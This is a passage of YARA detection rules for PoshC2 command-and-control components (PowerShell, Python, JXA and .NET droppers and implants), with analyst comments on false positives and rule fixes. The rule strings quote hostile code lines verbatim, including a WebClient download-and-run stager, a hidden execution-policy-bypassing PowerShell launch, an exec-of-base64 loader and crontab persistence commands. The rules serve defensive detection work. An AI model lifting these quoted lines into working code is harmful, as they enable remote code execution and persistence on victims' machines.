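        $s5 = "lpThreadId" ascii fullword
        $s6 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword
        $s7 = " <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword
        $s8 = "lpAddress" ascii fullword
        $s9 = "Protection" ascii fullword
        $s10 = "Program" ascii fullword
        $s11 = "lpStartAddress" ascii fullword
        $s12 = "RefSafetyRulesAttribute" ascii fullword
        $s13 = "flNewProtect" ascii fullword
        $s14 = "lpflOldProtect" ascii fullword
        $s15 = " </trustInfo>" ascii fullword
        $s16 = "EmbeddedAttribute" ascii fullword
        $s17 = "dwStackSize" ascii fullword
        $s18 = "#REPLACEME64#" wide fullword
        $s19 = "#REPLACEME32#" wide fullword
        $s20 = "System.Runtime.CompilerServices" ascii fullword
        $s21 = "FromBase64String" ascii fullword
    condition:
        (
            uint16(0) == 0x5a4d
            and filesize < 20KB
            and 8 of them
        )
        // exact-sample fallback
        or hash.sha256(0, filesize) == "df8474fe610372aff283b0429626e1663b27e7c651242fbc7687ca6fd2d45caa"
}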
|
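import "hash"

// PoshC2 DynamicCode.exe (.NET).
// Only $s1, $s2 and $s13 are specific to this tool; the other 13 strings are manifest XML and
// .NET/Roslyn boilerplate ("Program", "Console", "System", EmbeddedAttribute, ...). Because the
// threshold is "8 of them", a small managed executable can satisfy it on boilerplate alone, so
// confirm $s1/$s2/$s13 on generic hits. Hash clause is evaluated last so the whole-file hash is
// only computed when the cheaper checks fail.
rule PoshC2_DynamicCode {
    meta:
        description = "PoshC2 - DynamicCode.exe"
        sha256 = "8ce3b90e96a7cfabb6b2b4fc692ea7ca8da105754eb06f662b572e5f549f280f"
    strings:
        $s1 = "DynamicCode.exe" ascii fullword
        $s2 = "Dynamic Code executed successfully" wide fullword
        $s3 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword
        $s4 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword
        $s5 = "Microsoft.CodeAnalysis" ascii fullword
        $s6 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword
        $s7 = " <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword
        $s8 = "Program" ascii fullword
        $s9 = "Console" ascii fullword
        $s10 = "RefSafetyRulesAttribute" ascii fullword
        $s11 = " </trustInfo>" ascii fullword
        $s12 = "EmbeddedAttribute" ascii fullword
        $s13 = "PoshC2DynamicCode" ascii fullword
        $s14 = "System.Runtime.CompilerServices" ascii fullword
        $s15 = "System" ascii fullword
        $s16 = " </requestedPrivileges>" ascii fullword
    condition:
        (
            uint16(0) == 0x5a4d
            and filesize < 10KB
            and 8 of them
        )
        // exact-sample fallback
        or hash.sha256(0, filesize) == "8ce3b90e96a7cfabb6b2b4fc692ea7ca8da105754eb06f662b572e5f549f280f"
}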
|
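import "hash"

// PoshC2 fcomm.exe implant (.NET).
// The implant command vocabulary ($s4, $s11, $s12, $s14), class/method names ($s7, $s10, $s18-$s20)
// and the FComm status message ($s15) are the discriminating strings; $s2, $s5, $s16 and $s17 are
// manifest/Roslyn boilerplate shared with other .NET builds. Hash clause is evaluated last so
// the whole-file hash is only computed when the cheaper checks fail.
rule PoshC2_Fcomm {
    meta:
        description = "PoshC2 - fcomm.exe"
        sha256 = "f770e4b68e8d911e51a4de4cd84b36f290b7fcabe866063e26cee47afd98ba6c"
    strings:
        $s1 = "fcomm.exe" ascii fullword
        $s2 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword
        $s3 = "ParseCommandLineArgs" ascii fullword
        $s4 = "run-dll-background" wide fullword
        $s5 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword
        $s6 = "HostInfo" ascii fullword
        $s7 = "GetCurrentTasking" ascii fullword
        $s8 = "objContents" ascii fullword
        $s9 = "get_Actioned" ascii fullword
        $s10 = "CreateEncryptionAlgorithm" ascii fullword
        $s11 = "run-dll" wide fullword
        $s12 = "run-exe Core.Program Core " wide fullword
        $s13 = "initialised" ascii fullword
        $s14 = "loadmodule" wide fullword
        $s15 = "[!] This is not implemented yet in FComm implant types." wide fullword
        $s16 = "Microsoft.CodeAnalysis" ascii fullword
        $s17 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword
        $s18 = "SafeFileRead" ascii fullword
        $s19 = "FCommConnect" ascii fullword
        $s20 = "GzipCompress" ascii fullword
    condition:
        (
            uint16(0) == 0x5a4d
            and filesize < 40KB
            and 8 of them
        )
        // exact-sample fallback
        or hash.sha256(0, filesize) == "f770e4b68e8d911e51a4de4cd84b36f290b7fcabe866063e26cee47afd98ba6c"
}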
|
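import "hash"

// PoshC2 pbind.exe (named-pipe implant, .NET).
// Template placeholders ($s8, $s18), pipe status messages ($s12, $s14) and the implant command
// vocabulary ($s4, $s5, $s10, $s11, $s13, $s20) are the discriminating strings; $s3, $s7, $s15,
// $s16 and $s21 are manifest/Roslyn boilerplate. Hash clause is evaluated last so the
// whole-file hash is only computed when the cheaper checks fail.
rule PoshC2_Pbind {
    meta:
        description = "PoshC2 - pbind.exe"
        sha256 = "fc02c496d646b60fd70e2ad4be6e35b3f16aaf6c34ee47a7fb81d00cd54ab383"
    strings:
        $s1 = "pbind.exe" ascii fullword
        $s2 = "[+] Running task in background, run get-bg to get background output." wide fullword
        $s3 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword
        $s4 = "ParseCommandLineArgs" ascii fullword
        $s5 = "run-dll-background" wide fullword
        $s6 = "[*] Only run one task in the background at a time per implant." wide fullword
        $s7 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword
        $s8 = "#REPLACEPBINDPIPENAME#" wide fullword
        $s9 = "CreateEncryptionAlgorithm" ascii fullword
        $s10 = "run-dll" wide fullword
        $s11 = "run-exe Core.Program Core " wide fullword
        $s12 = "$[-] Cannot read from pipe" wide fullword
        $s13 = "loadmodule" wide fullword
        $s14 = "[-] No output" wide fullword
        $s15 = "Microsoft.CodeAnalysis" ascii fullword
        $s16 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword
        $s17 = "GzipCompress" ascii fullword
        $s18 = "#REPLACEKEY#" wide fullword
        $s19 = "Error loading modules {0}" wide fullword
        $s20 = "run-exe-background" wide fullword
        $s21 = "Invoke" wide fullword
    condition:
        (
            uint16(0) == 0x5a4d
            and filesize < 40KB
            and 8 of them
        )
        // exact-sample fallback
        or hash.sha256(0, filesize) == "fc02c496d646b60fd70e2ad4be6e35b3f16aaf6c34ee47a7fb81d00cd54ab383"
}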
|
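import "hash"

// PoshC2 Sharp_Powershell_Runner.exe (.NET, hosts a PowerShell runspace).
// Specific strings: $s1, $s2, $s7, $s8, $s11, $s12, $s14 and $s20; the runspace/automation
// accessor names ($s4, $s6) also appear in benign PowerShell hosts, and $s3, $s5, $s9, $s10,
// $s13, $s15-$s19 are manifest/Roslyn boilerplate. Hash clause is evaluated last so the
// whole-file hash is only computed when the cheaper checks fail.
rule PoshC2_Sharp_Powershell_Runner {
    meta:
        description = "PoshC2 Sharp_Powershell_Runner.exe"
        sha256 = "a7fbb82f2606e3ec217d94fe83d4127e3a5a47290141875ff150243024fb2259"
    strings:
        $s1 = "Sharp_Powershell_Runner.exe" ascii fullword
        $s2 = "basepayload" ascii fullword
        $s3 = " <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"/>" ascii fullword
        $s4 = "get_SessionStateProxy" ascii fullword
        $s5 = " <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\"/>" ascii fullword
        $s6 = "get_PSVariable" ascii fullword
        $s7 = "Sharp_Powershell_Runner" ascii fullword
        $s8 = "InvokeAutomation" ascii fullword
        $s9 = "Microsoft.CodeAnalysis" ascii fullword
        $s10 = " <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">" ascii fullword
        $s11 = "DllBaseAddress" ascii fullword
        $s12 = "RunspaceInvoke" ascii fullword
        $s13 = " <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">" ascii fullword
        $s14 = "$o = IEX $c | Out-String" wide fullword
        $s15 = "Program" ascii fullword
        $s16 = "Encoding" ascii fullword
        $s17 = "RefSafetyRulesAttribute" ascii fullword
        $s18 = " </trustInfo>" ascii fullword
        $s19 = "EmbeddedAttribute" ascii fullword
        $s20 = "baseAddr" ascii fullword
    condition:
        (
            uint16(0) == 0x5a4d
            and filesize < 20KB
            and 8 of them
        )
        // exact-sample fallback
        or hash.sha256(0, filesize) == "a7fbb82f2606e3ec217d94fe83d4127e3a5a47290141875ff150243024fb2259"
}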
|
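import "pe"
import "hash"

// PoshC2 dropper.exe (native, MSVC).
// Almost every string here is MSVC C++ runtime/RTTI boilerplate ($s1-$s12, $s14, $s18-$s20) or
// an incidental opcode byte run ($s13, $s16, $s17); the rule's real discriminator is the
// combination of the fixed "_RDATA" section position with the four process-injection imports.
// The original read pe.sections[4] without checking the section count; an out-of-range index
// yields an undefined value that YARA treats as false, so the explicit guard below keeps the
// same match set but makes the requirement visible. Hash clause is evaluated last so the
// whole-file hash is only computed when the cheaper checks fail.
rule PoshC2_Dropper {
    meta:
        description = "PoshC2 - dropper.exe"
        sha256 = "9062d8c9e744b3963ea16f1df295fdf9e463902bfe37b8bae376a21a441851b4"
    strings:
        $s1 = "AppPolicyGetProcessTerminationMethod" ascii fullword
        $s2 = " Type Descriptor'" ascii fullword
        $s3 = "operator co_await" ascii fullword
        $s4 = "operator<=>" ascii fullword
        $s5 = ".data$rs" ascii fullword
        $s6 = "api-ms-win-appmodel-runtime-l1-1-2" wide fullword
        $s7 = " Class Hierarchy Descriptor'" ascii fullword
        $s8 = " Base Class Descriptor at (" ascii fullword
        $s9 = " Complete Object Locator'" ascii fullword
        $s10 = "__swift_3" ascii fullword
        $s11 = "__swift_2" ascii fullword
        $s12 = ".rdata$voltmd" ascii fullword
        $s13 = "xWI96tRI" ascii fullword
        $s14 = " delete[]" ascii fullword
        $s15 = "__swift_1" ascii fullword
        $s16 = "vKfffff" ascii fullword
        $s17 = "D$0@8{" ascii fullword
        $s18 = "api-ms-win-core-file-l1-2-4" wide fullword
        $s19 = "api-ms-win-core-file-l1-2-2" wide fullword
        $s20 = " delete" ascii fullword
    condition:
        (
            // fifth section (index 4) must exist and be named _RDATA
            pe.number_of_sections > 4
            and pe.sections[4].name == "_RDATA"
            and pe.imports("kernel32.dll", "WriteProcessMemory")
            and pe.imports("kernel32.dll", "CreateRemoteThread")
            and pe.imports("kernel32.dll", "OpenProcess")
            and pe.imports("kernel32.dll", "TerminateProcess")
            and uint16(0) == 0x5a4d
            and filesize < 300KB
            and 8 of them
        )
        // exact-sample fallback
        or hash.sha256(0, filesize) == "9062d8c9e744b3963ea16f1df295fdf9e463902bfe37b8bae376a21a441851b4"
}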
|
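import "hash"

// PoshC2 DotNet2JS.js (JScript loader with an embedded base64 assembly).
// Caveat for hunters: $s1-$s17 are runs of "A" from base64-encoded zero padding and several are
// substrings of one another ($s2 is contained in $s1, for example), so any script or text file
// carrying a base64 blob with long zero runs can satisfy "8 of them" on those alone. The three
// JScript lines ($s18-$s20) are the only tool-specific strings; require at least one of them
// when triaging generic hits. Magic 0x6176 is the little-endian "va" of a file starting with
// "var". Hash clause is evaluated last so the whole-file hash is only computed when the cheaper
// checks fail.
rule PoshC2_DotNet2JS {
    meta:
        description = "PoshC2 - DotNet2JS.js"
        sha256 = "1193794ebfc3f9ae58e6bb443ecd783274285396c8b23533683e10da0c9d5c53"
    strings:
        $s1 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        $s2 = "AAAAAAAAAAAAAAAAAAAAAAAAA"
        $s3 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        $s4 = "AAAAAAAAAAAAAEAAAE"
        $s5 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
        $s6 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAB"
        $s7 = "AAAAAAAAAAAAAAAAAAAAAAAAB"
        $s8 = "AAAAAAAAAAD"
        $s9 = "AAAAAAAAAEA"
        $s10 = "AAAAAAAAAAAAAAAAAAAAAAAAAAABD"
        $s11 = "AADAAAABAAAA"
        $s12 = "AAAAAAAAAAAAAAAAAAAAAcC0AAAAAAAB"
        $s13 = "ADAAAAA4AA"
        $s14 = "AAAAAAAAAAAAAE4A"
        $s15 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAA"
        $s16 = "AABAACAAAEAA"
        $s17 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAA"
        $s18 = "function dbg(s) {WScript.Echo(s);}" ascii fullword
        $s19 = "var ba = enc.GetBytes_4(b);" ascii fullword
        $s20 = "var length = enc.GetByteCount_2(b);" ascii fullword
    condition:
        (
            uint16(0) == 0x6176
            and filesize < 30KB
            and 8 of them
        )
        // exact-sample fallback
        or hash.sha256(0, filesize) == "1193794ebfc3f9ae58e6bb443ecd783274285396c8b23533683e10da0c9d5c53"
}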
|
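import "hash"

// PoshC2 stage2core.so (native Linux implant statically linked with mbedTLS).
// Caveat for hunters: nearly all strings are verbatim mbedTLS error descriptions and will be
// present in any ELF that bundles mbedTLS (three of the four $x strings included). The only
// tool-specific string is $x3 ("Error running command on shell - "), so prefer hits where $x3 is
// among the matched strings. Hash clause is evaluated last so the whole-file hash is only
// computed when the cheaper checks fail.
rule PoshC2_Stage2core {
    meta:
        description = "PoshC2 - stage2core.so"
        sha256 = "e3823d2aaaf868aba237b034a13bf8ef6dd6cf0fc4c29f7e7c247d57b06ff61c"
    strings:
        $x1 = "SSL - Processing of the ClientKeyExchange handshake message failed in DHM / ECDH Read Public" ascii fullword
        $x2 = "SSL - Processing of the ServerKeyExchange handshake message failed" ascii fullword
        $x3 = "Error running command on shell - " ascii fullword
        $x4 = "SSL - Processing of the ClientKeyExchange handshake message failed" ascii fullword
        $s5 = "SSL - Processing of the ClientKeyExchange handshake message failed in DHM / ECDH Calculate Secret" ascii fullword
        $s6 = "SSL - Processing of the compression / decompression failed" ascii fullword
        $s7 = "SSL - Processing of the NewSessionTicket handshake message failed" ascii fullword
        $s8 = "PKCS12 - Given private key password does not allow for correct decryption" ascii fullword
        $s9 = "PKCS5 - Given private key password does not allow for correct decryption" ascii fullword
        $s10 = "PK - Given private key password does not allow for correct decryption" ascii fullword
        $s11 = "PEM - Given private key password does not allow for correct decryption" ascii fullword
        $s12 = "NET - Failed to get an IP address for the given hostname" ascii fullword
        $s13 = "Error reading private key %s - mbedTLS: (-0xX) %s" ascii fullword
        $s14 = "PK - Type mismatch, eg attempt to encrypt with an ECDSA key" ascii fullword
        $s15 = "SSL - Processing of the ServerHello handshake message failed" ascii fullword
        $s16 = "RSA - The private key operation failed" ascii fullword
        $s17 = "SSL - Processing of the ChangeCipherSpec handshake message failed" ascii fullword
        $s18 = "SSL - Processing of the Finished handshake message failed" ascii fullword
        $s19 = "RSA - The public key operation failed" ascii fullword
        $s20 = "SSL - Processing of the ServerHelloDone handshake message failed" ascii fullword
    condition:
        (
            uint16(0) == 0x457f
            and filesize < 4000KB
            and 1 of ($x*)
            and 4 of them
        )
        // exact-sample fallback
        or hash.sha256(0, filesize) == "e3823d2aaaf868aba237b034a13bf8ef6dd6cf0fc4c29f7e7c247d57b06ff61c"
}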
|
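import "hash"

// PoshC2 dropper.ps1 (PowerShell stager template).
// Matches the script source: magic 0x5223 is the little-endian "#R" of a file beginning with a
// "#REPLACE..." placeholder, and the unreplaced placeholders ($s4, $s7, $s16, $s17, $s20) are
// the strongest indicators — a generated dropper with them substituted will only match on the
// remaining code lines. The original $s13 repeated $s12 byte-for-byte and counted twice toward
// "8 of them"; it is dropped and the threshold kept at 8. Hash clause is evaluated last so the
// whole-file hash is only computed when the cheaper checks fail.
rule PoshC2_DropperPs1 {
    meta:
        description = "PoshC2 - dropper.ps1"
        sha256 = "a7f763a818db6da6433b4ffcafbbbd680597fee28bb97760ddd384caf0c25992"
    strings:
        $s1 = "$primern = (Get-Webclient -Cookie $pp).downloadstring($script:s)" ascii fullword
        $s2 = "if ($h -and (($psversiontable.CLRVersion.Major -gt 2))) {$wc.Headers.Add(\"Host\",$h)}" ascii fullword
        $s3 = "$procname = (Get-Process -id $pid).ProcessName" ascii fullword
        $s4 = "$o=\"$env:userdomain;$u;$env:computername;$env:PROCESSOR_ARCHITECTURE;$pid;$procname;#REPLACEURLID#\"" ascii fullword
        $s5 = "} if ($cookie) { $wc.Headers.Add([System.Net.HttpRequestHeader]::Cookie, \"SessionID=$Cookie\") }" ascii fullword
        $s6 = "$getcreds = new-object system.management.automation.PSCredential $username,$PSS;" ascii fullword
        $s7 = "$wc.Headers.Add(\"User-Agent\",\"#REPLACEUSERAGENT#\")" ascii fullword
        $s8 = "$PSS = ConvertTo-SecureString $password -AsPlainText -Force;" ascii fullword
        $s9 = "$wp.Credentials = $getcreds;" ascii fullword
        $s10 = "{$a.Key = [System.Convert]::FromBase64String($key)}" ascii fullword
        $s11 = "if ($username -and $password) {" ascii fullword
        $s12 = "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($u).Trim([char]"
        $s14 = "$d = (Get-Date -Format \"yyyy-MM-dd\");" ascii fullword
        $s15 = "if ($key.getType().Name -eq \"String\")" ascii fullword
        $s16 = "$password = \"#REPLACEPROXYPASS#\"" ascii fullword
        $s17 = "#REPLACEPROXYCOMMAND#" ascii fullword
        $s18 = "$wc = New-Object System.Net.WebClient;" ascii fullword
        $s19 = "$e = $a.CreateEncryptor()" ascii fullword
        $s20 = "elseif($h){$script:s=\"https://$($h)#REPLACECONNECT#\";$script:sc=\"https://$($h)\"}" ascii fullword
    condition:
        (
            uint16(0) == 0x5223
            and filesize < 10KB
            and 8 of them
        )
        // exact-sample fallback
        or hash.sha256(0, filesize) == "a7f763a818db6da6433b4ffcafbbbd680597fee28bb97760ddd384caf0c25992"
}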
|
import "hash"

// PoshC2 - dropper.py (Python stager).
// Notes for hunters:
//  - urllib2 ($s2, $s3, $s5, $s8, $s9, $s14) is Python 2 only, so this covers
//    the legacy Python 2 dropper; a Python 3 build would not carry these lines.
//  - $s12, $s13, $s15, $s16 and $s19 contain #REPLACE...# placeholders that a
//    generated dropper has already substituted; they match the source template,
//    not a deployed payload. The remaining strings still apply to generated files.
//  - $s17/$s19/$s20 are the kill-date check; $s10 is the exec(base64) stage loader.
rule PoshC2_DropperPy
{
    meta:
        description = "PoshC2 - dropper.py"
        sha256 = "33827cd5a6e15bbaf99e65f767e65e1b639f48d6b6bb7a6e9e8c8cf02355a1e7"

    strings:
        $s1 = "if hh[0]: headers = ({'Host':hh[0],'User-Agent':ua,'Cookie':'SessionID=%s' % encsid.decode(\"utf-8\")})" ascii fullword
        $s2 = "if hh[0]:r=urllib2.Request(url2,headers={'Host':hh[0],'User-agent':ua,'Cookie':'SessionID=%s' % encsid})" ascii fullword
        $s3 = "if hh[0]: r=urllib2.Request(url,headers={'Host':hh[0],'User-agent':ua})" ascii fullword
        $s4 = "else: headers = ({'User-Agent':ua,'Cookie':'SessionID=%s' % encsid.decode(\"utf-8\")})" ascii fullword
        $s5 = "else:r=urllib2.Request(url2,headers={'User-agent':ua,'Cookie':'SessionID=%s' % encsid})" ascii fullword
        $s6 = "encsid=encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,procname,urlid))" ascii fullword
        $s7 = "encsid=encrypt(key, '%s;%s;%s;%s;%s;%s;%s' % (un,hn,hn,arch,pid,pname,urlid))" ascii fullword
        $s8 = "else: r=urllib2.Request(url,headers={'User-agent':ua})" ascii fullword
        $s9 = "hn=socket.gethostname();o=urllib2.build_opener()" ascii fullword
        $s10 = "exec(base64.b64decode(x))" ascii fullword
        $s11 = "html = response.read().decode('utf-8');x=decrypt(key, html)" ascii fullword
        $s12 = "ua=\"#REPLACEUSERAGENT#\"" ascii fullword
        $s13 = "url=serverclean[0]+\"#REPLACEQUICKCOMMAND#\"" ascii fullword
        $s14 = "res=urllib2.urlopen(r);html=res.read();x=decrypt(key, html).rstrip('\\0');" ascii fullword
        $s15 = "serverclean=[#REPLACEHOSTPORT#]" ascii fullword
        $s16 = "pykey=\"#REPLACESPYTHONKEY#\"" ascii fullword
        $s17 = "if pykey in b and pyhash == s and cstr < kdn: " ascii fullword
        $s18 = "import os,sys,base64,ssl,socket,pwd,hashlib,time" ascii fullword
        $s19 = "kdn=time.strptime(\"#REPLACEKILLDATE#\",\"%Y-%m-%d\")" ascii fullword
        $s20 = "cstr=time.strftime(\"%Y-%m-%d\",time.gmtime());cstr=time.strptime(cstr,\"%Y-%m-%d\")" ascii fullword

    condition:
        // Exact known sample; evaluated first, so every scanned file is hashed in full.
        hash.sha256(0, filesize) == "33827cd5a6e15bbaf99e65f767e65e1b639f48d6b6bb7a6e9e8c8cf02355a1e7"
        or uint16(0) == 0x6d69   // file starts with "im" (little-endian), i.e. an import line
        and filesize < 6KB
        and 8 of them
}
|
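import "hash"

// PoshC2 - Implant-Core.py (Python implant).
// Hunting caveats:
//  - $x1 is a source comment (the Empire keylogger attribution). Stripping
//    comments from the implant removes the only $x string and the rule stops
//    matching; do not rely on it against a minimised build.
//  - The doubled "%%s" / "%%" forms look like the unrendered template
//    (TODO confirm against a generated implant, which may carry single "%s").
//  - $s3/$s19 (crontab persistence) and $s18 (exec of the keylogger payload)
//    are the most behaviour-specific lines.
rule PoshC2_ImplantCorePy
{
    meta:
        description = "PoshC2 - Implant-Core.py"
        sha256 = "8653f19782f1e19e86caf6fdadc17790eb9d68ff34c8a249e9e9e26ba8000c88"

    strings:
        // The original rule listed this string twice ($x1 and $x2); the
        // duplicate was removed so it cannot count twice toward "4 of them".
        $x1 = " # keylogger imported from https://raw.githubusercontent.com/EmpireProject/Empire/fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4/lib/"
        $s3 = " s.call(\"crontab -l | { cat; echo '* 10 * * * sh %%s'; } | crontab -\" %% filename, shell=True)" ascii fullword
        $s4 = " modpayload = modb64logger.replace(\"REPLACEME\",filename)" ascii fullword
        $s5 = " returnval = \"%%s \\\\r\\\\nKeylogger started here: %%s\" %% (pids, filename)" ascii fullword
        $s6 = " filename = \"%%s/%%s_psh.sh\" %% (dircontent, uuid.uuid4().hex)" ascii fullword
        $s7 = " dircontent = \"%%s/.%%s\" %% (os.environ['HOME'], uuid.uuid4().hex)" ascii fullword
        // Generator-truncated; the original also had it a second time as $s15
        // (removed for the same double-counting reason).
        $s8 = " if hh[0]: req=urllib2.Request(server,dataimagebytes,headers={'Host':str(hh[0]),'User-agent':str(ua),'Cookie':\"Sessi"
        $s9 = " returnval = \"Ran Start Another Implant - File dropped: %%s\" %% filename" ascii fullword
        $s10 = " returnval = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)" ascii fullword
        $s11 = " aes = get_encryption(key, iv)" ascii fullword
        $s12 = " if hh[0]: req=urllib2.Request(server,headers={'Host':str(hh[0]),'User-agent':str(ua)})" ascii fullword
        $s13 = " import subprocess as s" ascii fullword
        $s14 = "modules/python/collection/osx/keylogger.py" ascii fullword
        $s16 = " postcookie = encrypt(key, taskId).decode(\"utf-8\")" ascii fullword
        $s17 = " import subprocess" ascii fullword
        $s18 = " exec(modpayload)" ascii fullword
        $s19 = " s.call(\"crontab -l | { cat; } | grep -v '_psh.sh'| crontab -\", shell=True)" ascii fullword
        $s20 = " modb64logger = base64.b64decode(b64logger)" ascii fullword

    condition:
        // Exact known sample; evaluated first, so every scanned file is hashed in full.
        hash.sha256(0, filesize) == "8653f19782f1e19e86caf6fdadc17790eb9d68ff34c8a249e9e9e26ba8000c88"
        or (
            uint16(0) == 0x6d69     // file starts with "im" (little-endian), i.e. an import line
            and filesize < 40KB
            and 1 of ($x*)          // with a single $x this simply requires $x1
            and 4 of them           // "them" includes $x1, so this is $x1 plus three $s
        )
}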
|
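import "hash"

// PoshC2 - Implant-Core.js (JXA/macOS implant).
// Hunting caveats:
//  - Every $x string and $s11/$s12/$s14/$s16 are JavaScript comments
//    (attribution to the Mythic/apfell sources, commented-out console.log
//    lines). A minified or comment-stripped implant keeps none of them, so
//    the string part of this rule only finds an unstripped copy.
//  - $s13, $s15, $s17-$s20 are the real code lines (NSProcessInfo, doShellScript,
//    SecTransformExecute); these survive comment stripping.
rule PoshC2_ImplantCoreJS
{
    meta:
        description = "PoshC2 - Implant-Core.js"
        sha256 = "0b5c8f00eeaa6a63764f7f4807b53b37696882027443cf458895409c07aad26a"

    strings:
        $x1 = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/shell.js#L2-L23" ascii fullword
        // Generator-truncated; the original rule also listed this exact string
        // as $x3 (removed so it cannot count twice).
        $x2 = "// pulled fromhttps://github.com/its-a-feature/Mythic/blob/14b06e3755cea0f291ea6246fc315b9b30388640/Payload_Types/apfell/agent_c"
        $x4 = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L116-L124" ascii fullword
        $x5 = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/c2_profiles/HTTP.js#L115-L132"
        $x6 = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L9-L30" ascii fullword
        $x7 = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L70-L74" ascii fullword
        $x8 = "// Pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L2-L7" ascii fullword
        $x9 = "//console.log(\"Running command: \" + command);" ascii fullword
        $x10 = "// pulled from https://github.com/its-a-feature/Mythic/blob/master/Payload_Types/apfell/agent_code/base/apfell-jxa.js#L106-L115" ascii fullword
        $s11 = " //console.log(\"From Server: \" + readCommandClear);" ascii fullword
        $s12 = " //console.log(\"host header: \" + h);" ascii fullword
        $s13 = "this.pid = this.procInfo.processIdentifier;" ascii fullword
        $s14 = "//simply run a shell command via doShellScript and return the response" ascii fullword
        $s15 = "response = currentApp.doShellScript(command);" ascii fullword
        $s16 = " //console.log(\"in shell\");" ascii fullword
        $s17 = "this.procInfo = $.NSProcessInfo.processInfo;" ascii fullword
        $s18 = "this.osVersion = this.procInfo.operatingSystemVersionString.js;" ascii fullword
        $s19 = " let decryptedData = $.SecTransformExecute(decrypt, Ref());" ascii fullword
        $s20 = " let encryptedData = $.SecTransformExecute(encrypt, err);" ascii fullword

    condition:
        // Exact known sample; evaluated first, so every scanned file is hashed in full.
        hash.sha256(0, filesize) == "0b5c8f00eeaa6a63764f7f4807b53b37696882027443cf458895409c07aad26a"
        or (
            uint16(0) == 0x2f2f     // file starts with "//", i.e. a leading comment line
            and filesize < 40KB
            // The original condition was "1 of ($x*) and all of them": with
            // "all of them" the $x clause was redundant, and a single changed or
            // dropped comment line (a duplicated, truncated string among them)
            // defeated the rule. Use the same threshold style as the sibling rules.
            and 1 of ($x*)
            and 8 of them
        )
}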
|
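import "hash"

// PoshC2 - Implant-Core.ps1 (PowerShell implant).
// $x1 is the strongest string: it builds the hidden, execution-policy-bypassing
// "powershell -exec bypass -Noninteractive -windowstyle hidden -e <base64>" command
// line and is worth hunting on its own (process command lines, script block logs).
// $s3/$s5/$s19 are the deflate+base64 loader; $s6/$s7/$s18 the AES decrypt helper.
rule PoshC2_ImplantCorePs1
{
    meta:
        description = "PoshC2 - Implant-Core.ps1"
        sha256 = "6d520463f8563d6a296d22b6824c690c9b6de8121c9b6f08307947874667c5f2"

    strings:
        $x1 = "$payloadraw = \"powershell -exec bypass -Noninteractive -windowstyle hidden -e $($EncodedPayloadScript)\"" ascii fullword
        $s2 = "$EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript))" ascii fullword
        // The generator emitted several byte-identical pairs ($s3/$s10, $s11/$s12,
        // $s14/$s16, $s15/$s17). The second copy of each was removed so one hit
        // no longer counts twice toward "4 of them"; identifiers were kept.
        $s3 = "$NewScript = \"sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64Stri"
        $s4 = "$ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($payloadclear)" ascii fullword
        $s5 = "g(`\"$EncodedCompressedScript`\"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()\"" ascii fullword
        $s6 = " $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16)" ascii fullword
        $s7 = " $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);" ascii fullword
        $s8 = "$EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)" ascii fullword
        $s9 = "$payload = $payloadraw -replace \"`n\", \"\"" ascii fullword
        $s11 = " [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([System.Text.Encoding]::UTF8.GetString($unencrypte"
        $s13 = " $splitcmd = $ReadCommandClear -replace \"multicmd\",\"\"" ascii fullword
        $s14 = " $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencrypte"
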